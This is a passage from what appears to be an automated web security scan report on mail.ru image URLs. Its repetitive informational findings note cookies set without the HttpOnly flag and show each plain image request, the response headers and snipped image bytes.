Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F....
...[SNIP]...
17.136. http://r2.mail.ru/b12526060.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526060.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
17.137. http://r2.mail.ru/b12526061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526061.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...
17.138. http://r2.mail.ru/b12526062.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526062.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
17.139. http://r2.mail.ru/b12526063.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526063.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...
17.140. http://r2.mail.ru/b12526064.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526064.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...
17.141. http://r2.mail.ru/b12526065.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526065.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;
17.142. http://r2.mail.ru/b12526191.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526191.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...
17.143. http://r2.mail.ru/b12526192.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526192.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;
17.144. http://r2.mail.ru/b12526193.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526193.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...
17.145. http://r2.mail.ru/b12526194.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526194.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;
17.146. http://r2.mail.ru/b12526208.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526208.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;
17.147. http://r2.mail.ru/b12526210.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526210.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;
17.148. http://r2.mail.ru/b12527647.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12527647.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;
17.149. http://r2.mail.ru/b12529050.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12529050.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...
17.150. http://r2.mail.ru/b12530142.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530142.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
17.151. http://r2.mail.ru/b12530159.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530159.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
17.152. http://r2.mail.ru/b12531249.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531249.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
17.153. http://r2.mail.ru/b12531545.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531545.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
